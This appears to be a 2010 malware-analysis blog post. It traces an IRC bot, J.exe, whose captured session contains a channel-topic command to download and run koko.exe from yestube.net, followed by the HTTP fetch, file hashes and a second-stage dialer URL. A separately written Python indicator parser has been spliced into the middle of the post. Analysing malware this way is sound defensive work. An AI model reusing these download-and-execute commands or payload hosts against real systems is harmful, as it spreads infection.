Tuesday, March 16, 2010

J.exe feat. koko.exe

J.exe starts us off with a DNS query for lamer.mqbol.com (74.117.174.69) and a TCP connection to it on port 3935. That port hosts an IRC server with a botnet channel:

NICK [00|USA|173151]
USER XP-7120 * 0 :LAB2
:li16.centertel.il NOTICE AUTH :*** Looking up your hostname...
:li16.centertel.il NOTICE AUTH :*** Found your hostname
:li16.centertel.il 001 [00|USA|173151]
:li16.centertel.il 002 [00|USA|173151]
:li16.centertel.il 003 [00|USA|173151]
:li16.centertel.il 004 [00|USA|173151]
:li16.centertel.il 005 [00|USA|173151]
:li16.centertel.il 005 [00|USA|173151]
:li16.centertel.il 005 [00|USA|173151]
:li16.centertel.il 422 [00|USA|173151] :MOTD File is missing
:[00|USA|173151] MODE [00|USA|173151] :+iwRG
MODE [00|USA|173151] -ix
JOIN ##J##
MODE [00|USA|173151] -ix
JOIN ##J##
MODE [00|USA|173151] -ix
JOIN ##J##
:[00|USA|173151]!XP-7120@my.hostname.net JOIN :##J##
:li16.centertel.il 332 [00|USA|173151] ##J## :.NAZEL http://yestube.net/koko.exe cnhfnnv.exe 1
:li16.centertel.il 333 [00|USA|173151] ##J## J4k3r 1268655877
MODE [00|USA|173151] -ix
JOIN ##J##
PRIVMSG ##J## :.::[Download]::. File download: 84.0KB to: cnhfnnv.exe @ 84.0KB/sec.
:li16.centertel.il 404 [00|USA|173151] ##J## :You must have a registered nick (+r) to talk on this channel (##J##)
PRIVMSG ##J## :.::[Download]::. Failed to create process: "cnhfnnv.exe", error: <267>
:li16.centertel.il 404 [00|USA|173151] ##J## :You must have a registered nick (+r) to talk on this channel (##J##)
PING :li16.centertel.il
PONG li16.centertel.il

The executive summary for the botnet follows:

Nickname: [00|USA|173151]
Reported hostname of the IRC server: li16.centertel.il
Channel: ##J##
Channel Topic: .NAZEL http://yestube.net/koko.exe cnhfnnv.exe 1

Judging by the topic and the download messages, J.exe reads the channel topic as a command and runs it. Here it tries to download http://yestube.net/koko.exe (69.4.235.235) and save it as cnhfnnv.exe:
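The capture above is the whole story of this bot in one session: nick, server, channel, topic-as-command and the bot's own status reports. As an added example (my code, not the post's or the malware's), the parser below splits each IRC line per RFC 1459 framing and pulls out the fields that end up in the executive summary: the bot nick, the server name the IRC daemon reports, the joined channel, the topic, who set it, and, when the topic is a download command, the URL, its host and the drop file name. The nick pattern and the ".VERB <url> <filename>" command shape are assumptions generalised from this one capture; the sample session embedded below is a constructed, abridged copy of the one in the post.

```python
"""
Extract botnet indicators from a captured IRC C2 session.

Assumptions (not facts from the post): the bot nick format is
[NN|COUNTRY|digits] and a topic command looks like ".VERB <url> <filename> ...".
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Constructed sample: abridged copy of the session shown in the post.
SAMPLE_SESSION = """\
NICK [00|USA|173151]
USER XP-7120 * 0 :LAB2
:li16.centertel.il NOTICE AUTH :*** Looking up your hostname...
:li16.centertel.il 001 [00|USA|173151]
:li16.centertel.il 422 [00|USA|173151] :MOTD File is missing
MODE [00|USA|173151] -ix
JOIN ##J##
:[00|USA|173151]!XP-7120@my.hostname.net JOIN :##J##
:li16.centertel.il 332 [00|USA|173151] ##J## :.NAZEL http://yestube.net/koko.exe cnhfnnv.exe 1
:li16.centertel.il 333 [00|USA|173151] ##J## J4k3r 1268655877
PRIVMSG ##J## :.::[Download]::. File download: 84.0KB to: cnhfnnv.exe @ 84.0KB/sec.
PRIVMSG ##J## :.::[Download]::. Failed to create process: "cnhfnnv.exe", error: <267>
PING :li16.centertel.il
"""

# Assumed nick shape for this family, generalised from the one nick in the capture.
BOT_NICK_RE = re.compile(r"^\[\d{2}\|[A-Z]{2,3}\|\d+\]$")
# Assumed topic-command shape: dot-verb, then a URL, then the local file name.
TOPIC_CMD_RE = re.compile(r"^\.(?P<verb>\w+)\s+(?P<url>https?://\S+)\s+(?P<name>\S+)")


@dataclass
class IrcSummary:
    nick: Optional[str] = None
    server: Optional[str] = None           # hostname the IRC daemon reports in 001
    channels: List[str] = field(default_factory=list)
    topic: Optional[str] = None
    topic_set_by: Optional[str] = None
    download_url: Optional[str] = None
    download_host: Optional[str] = None
    drop_name: Optional[str] = None
    bot_messages: List[str] = field(default_factory=list)  # the bot's own PRIVMSGs


def parse_irc_line(line: str) -> Tuple[Optional[str], str, List[str]]:
    """Split one IRC line into (prefix, COMMAND, params); the trailing ':' param is kept whole."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    command, params = parts[0].upper(), parts[1:]
    if trailing is not None:
        params.append(trailing)
    return prefix, command, params


def is_bot_nick(nick: Optional[str]) -> bool:
    return bool(nick) and BOT_NICK_RE.match(nick) is not None


def summarize_session(text: str) -> IrcSummary:
    """Walk the session and fill in the executive-summary fields."""
    s = IrcSummary()
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        prefix, cmd, params = parse_irc_line(raw)
        if cmd == "NICK" and prefix is None and params:
            s.nick = params[0]                      # what the client sent
        elif cmd == "JOIN" and prefix is None and params:
            if params[0] not in s.channels:
                s.channels.append(params[0])
        elif cmd == "001" and prefix:
            s.server = prefix                       # RPL_WELCOME carries the server name
        elif cmd == "332" and len(params) >= 3:     # RPL_TOPIC: <nick> <channel> :<topic>
            s.topic = params[2]
            m = TOPIC_CMD_RE.match(s.topic)
            if m:
                s.download_url = m.group("url")
                s.download_host = urlparse(s.download_url).hostname
                s.drop_name = m.group("name")
        elif cmd == "333" and len(params) >= 4:     # RPL_TOPICWHOTIME: <nick> <channel> <setter> <ts>
            s.topic_set_by = params[2]
        elif cmd == "PRIVMSG" and prefix is None and len(params) >= 2:
            s.bot_messages.append(params[1])        # unprefixed = sent by the bot itself
    return s


if __name__ == "__main__":
    summary = summarize_session(SAMPLE_SESSION)
    print(f"bot nick:   {summary.nick} (matches family pattern: {is_bot_nick(summary.nick)})")
    print(f"server:     {summary.server}")
    print(f"channels:   {summary.channels}")
    print(f"topic:      {summary.topic!r} set by {summary.topic_set_by}")
    print(f"download:   {summary.download_url} -> {summary.drop_name} (host {summary.download_host})")
    for msg in summary.bot_messages:
        print(f"bot said:   {msg}")
```

The URL host and drop file name are the pieces worth feeding into a blocklist or a host-based search; the unprefixed PRIVMSG lines are the bot reporting back, which is why the server rejects them with 404 (the nick is not registered) without that stopping the infection.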

GET /koko.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: yestube.net

HTTP/1.1 200 OK
Date: Wed, 17 Mar 2010 03:45:35 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Thu, 04 Mar 2010 05:03:10 GMT
ETag: "abe0010-1502b-83e35f80"
Accept-Ranges: bytes
Content-Length: 86059
Content-Type: application/x-msdownload

...

For whatever reason this download didn't work, but koko.exe does look familiar!

The new koko.exe binary and the old one aren't the same:

dennis@ipa:~$ ls -l koko.exe
-rw-r--r-- 1 dennis wheel 86059 Mar 16 22:48 koko.exe
dennis@ipa:~$ md5 koko.exe
MD5 (koko.exe) = 4e9d97f9ff17a2240dafa7d65eef65ca

old:

dennis@ipa:~/projects/exe-sigs/J.exe$ ls -l J.exe
-rw-r--r-- 1 dennis dennis 39424 Mar 16 21:09 J.exe
dennis@ipa:~/projects/exe-sigs/J.exe$ md5 J.exe
MD5 (J.exe) = ce818983eaabca13114fdda012b63dd4

But a quick run through mwanalysis shows it is up to the same tricks, downloading http://193.242.108.49/Dialer_Min/number.asp.

Virustotal
mwanalysis
ThreatExpert
